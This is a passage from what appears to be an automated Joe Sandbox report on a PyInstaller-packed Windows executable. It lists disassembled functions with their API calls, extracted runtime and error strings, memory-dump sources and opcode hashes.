                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                      • String ID: P%
                                                                                      • API String ID: 2147705588-2959514604
                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                      • Instruction ID: 8e49502afe0649f0e048a1c0c177276a1f758f142f0379655705d5355395b2fc
                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                      • Instruction Fuzzy Hash: B2510626608BA186D7749F36A4581BAF7A1FB98B65F004131EFEE47694DF3CD085CB20
                                                                                      Function 00007FF7F3DD80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                      • String ID: Needs to remove its temporary files.
                                                                                      • API String ID: 3975851968-2863640275
                                                                                      • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                      • Instruction ID: fa1522f97fb98892dfe46c309bd3000e60e2174a9f8c404bb961c01f4937379c
                                                                                      • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                      • Instruction Fuzzy Hash: EB218821B09A4282E7916BF9F884179A350EF89B90F984131DE3D5B3D8DE2CD5598360
                                                                                      Function 00007FF7F3DE6290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: -$:$f$p$p
                                                                                      • API String ID: 3215553584-2013873522
                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                      • Instruction ID: 5e72220c1a9951190760defcdf5b29bcb7f8b6d8fdbf3005cafdf6d8a8781a45
                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                      • Instruction Fuzzy Hash: D112D662E1C24386FBA87E94D144279FE91FB40754FC44235D6A92BAC4DF3CE5C08BA2
                                                                                      Function 00007FF7F3DE0FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: f$f$p$p$f
                                                                                      • API String ID: 3215553584-1325933183
                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                      • Instruction ID: 93c77003ae05eb8f7df6ed0cd9f73ba6a37035c28a0fe4c194a1df7c6810b29a
                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                      • Instruction Fuzzy Hash: 2B12AB62F0C14385FBA8BA94D044279FEA9FB40754FC44235D6BA5A6C4DB7CE4C487A2
                                                                                      Function 00007FF7F3DD1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                      • API String ID: 2050909247-3659356012
                                                                                      • Opcode ID: d436057c5a6e521730f70869508030d05780905e32113d9df76236ab545b9bde
                                                                                      • Instruction ID: dadcda14d6b83b980c0354c7bfc0dc0128aa30ee8e9a7e8485dd92544c0c36ec
                                                                                      • Opcode Fuzzy Hash: d436057c5a6e521730f70869508030d05780905e32113d9df76236ab545b9bde
                                                                                      • Instruction Fuzzy Hash: 81418E61A0865382EB94FB92A8406B9F7A5FF44BC4FC44532ED2D2B7C5DE3CE54583A0
                                                                                      Function 00007FF7F3DD1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                      • API String ID: 2050909247-3659356012
                                                                                      • Opcode ID: 890a830d18fe948d04508dae397803de1745eda11f1e360a34a7b44da65b0a77
                                                                                      • Instruction ID: 1707ef3a49e271e07163ff1ddbfb7564dd7ab755d4cf15c5305be77f46131eea
                                                                                      • Opcode Fuzzy Hash: 890a830d18fe948d04508dae397803de1745eda11f1e360a34a7b44da65b0a77
                                                                                      • Instruction Fuzzy Hash: AE418D21A0864386EB90EBA1A4412B9F3A4EF44784FC44532ED6D2BBD9DE3CE541C7A1
                                                                                      Function 00007FF7F3DDEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 849930591-393685449
                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                      • Instruction ID: 87e55a07004d764e5f578cf396403638c36e6746f4176f38b9332c186a714f53
                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                      • Instruction Fuzzy Hash: C7D1813290874186EBA0EFA5D4403ADB7A4FB45788F900135EE9D6B7D9DF38E485C790
                                                                                      Function 00007FF7F3DEED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7F3DEF0AA,?,?,0000021C07578B08,00007FF7F3DEAD53,?,?,?,00007FF7F3DEAC4A,?,?,?,00007FF7F3DE5F3E), ref: 00007FF7F3DEEE8C
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7F3DEF0AA,?,?,0000021C07578B08,00007FF7F3DEAD53,?,?,?,00007FF7F3DEAC4A,?,?,?,00007FF7F3DE5F3E), ref: 00007FF7F3DEEE98
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeLibraryProc
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3013587201-537541572
                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                      • Instruction ID: 37933d31b63b379ae2dcbb5bd94ec17a9785335afdd77bd7dc2312315796d10e
                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                      • Instruction Fuzzy Hash: 68414761B09A1241EB99EB929800275A691BF48BD0FC84235DD3D6F3C4DF7CE88583A1
                                                                                      Function 00007FF7F3DD2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2C9E
                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2D63
                                                                                      • MessageBoxW.USER32 ref: 00007FF7F3DD2D99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                      • API String ID: 3940978338-251083826
                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                      • Instruction ID: 2512fbdb768b8aa149cdf9070e354e8befd28865d8375289a040942718875d56
                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                      • Instruction Fuzzy Hash: B031F622B08B4142E760BB65B8502ABB695BF887C8F810135EF6D6B7D9DF3CD546C390
                                                                                      Function 00007FF7F3DDDCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD4D
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD5B
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD85
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDDF3
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDDFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 2559590344-2084034818
                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                      • Instruction ID: 49d4018a666ae8789ed039aaefa646c712ae924cde501a2b2e9f5a88cd3f76e4
                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                      • Instruction Fuzzy Hash: 5A319321B1A741D1EF91AB92A4006B5B394FF48BA4F994535DD3D2E3C8DE3CE44482B0
                                                                                      Function 00007FF7F3DD6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                      • API String ID: 2050909247-2434346643
                                                                                      • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                      • Instruction ID: 2e98aeb31ad3609f410d40d03e7cd1250b60627e667e6268e44fecb39f8131b8
                                                                                      • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                      • Instruction Fuzzy Hash: C5414221A1C68691EBA1EBA0E4552E9B321FF44384FC00132EA7D6B6D9DF3CE515C7E0
                                                                                      Function 00007FF7F3DD2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7F3DD351A,?,00000000,00007FF7F3DD3F1B), ref: 00007FF7F3DD2AA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                      • API String ID: 2050909247-2900015858
                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                      • Instruction ID: 2338e62373cab731f4bafcc08fc800363c258485d9f93c51be2473388b693a90
                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                      • Instruction Fuzzy Hash: 2921A37261978242E7A0ABA1F8817E6B394FB883C0F800135FE9D6B699DF3CD1458790
                                                                                      Function 00007FF7F3DEB150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2506987500-0
                                                                                      • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                      • Instruction ID: 6397378a33eb6dfd7396cd54dd04011d575d1aab3762eaaa148440c2ef8a86e4
                                                                                      • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                      • Instruction Fuzzy Hash: E3216D24A0E64341F7DC73A19A52239DA525F447B0FC14734DC7E6EBC6DD2CB48043A2
                                                                                      Function 00007FF7F3DF7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                      • String ID: CONOUT$
                                                                                      • API String ID: 3230265001-3130406586
                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                      • Instruction ID: 9b6a9472490d9b769d5be196821b737aa5cb5c82b1e9c9949af106ac281c8a4d
                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                      • Instruction Fuzzy Hash: 53119A21718A4186E790AB52E894329A2A0FF88BE4F800234DD7E9F7D4DF7CD5148790
                                                                                      Function 00007FF7F3DD8ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8EFD
                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8F5A
                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8FE5
                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD9044
                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD9055
                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD906A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 3462794448-0
                                                                                      • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
